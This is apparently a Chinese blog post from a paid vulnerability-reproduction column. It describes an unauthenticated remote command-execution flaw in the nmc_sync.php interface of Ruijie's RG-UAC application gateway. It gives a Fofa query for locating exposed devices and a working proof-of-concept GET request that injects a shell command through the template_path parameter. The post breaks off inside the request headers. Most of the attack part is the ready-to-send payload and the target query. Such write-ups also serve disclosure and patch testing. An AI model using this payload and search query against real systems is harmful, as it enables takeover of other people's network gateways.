锐捷RG-UAC应用网关nmc_sync.php接口前台RCE

今天晚上早睡觉

已于 2024-03-09 18:30:28 修改

阅读量200

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-03-08 16:18:22 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136565309

版权

漏洞复现专栏收录该内容

363 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了锐捷RG-UAC应用网关的nmc_sync.php接口存在的未授权命令执行漏洞，详细阐述了漏洞的原理，并提供了影响版本信息及漏洞复现的POC。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

简介

锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。

漏洞简介

锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞，未经身份认证的攻击者可执行任意命令控制服务器权限。

影响版本

锐捷RG-UAC应用管理网关
Fofa:

app="Ruijie-RG-UAC"

漏洞复现

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|ls%20>tidetide.txt|cat HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0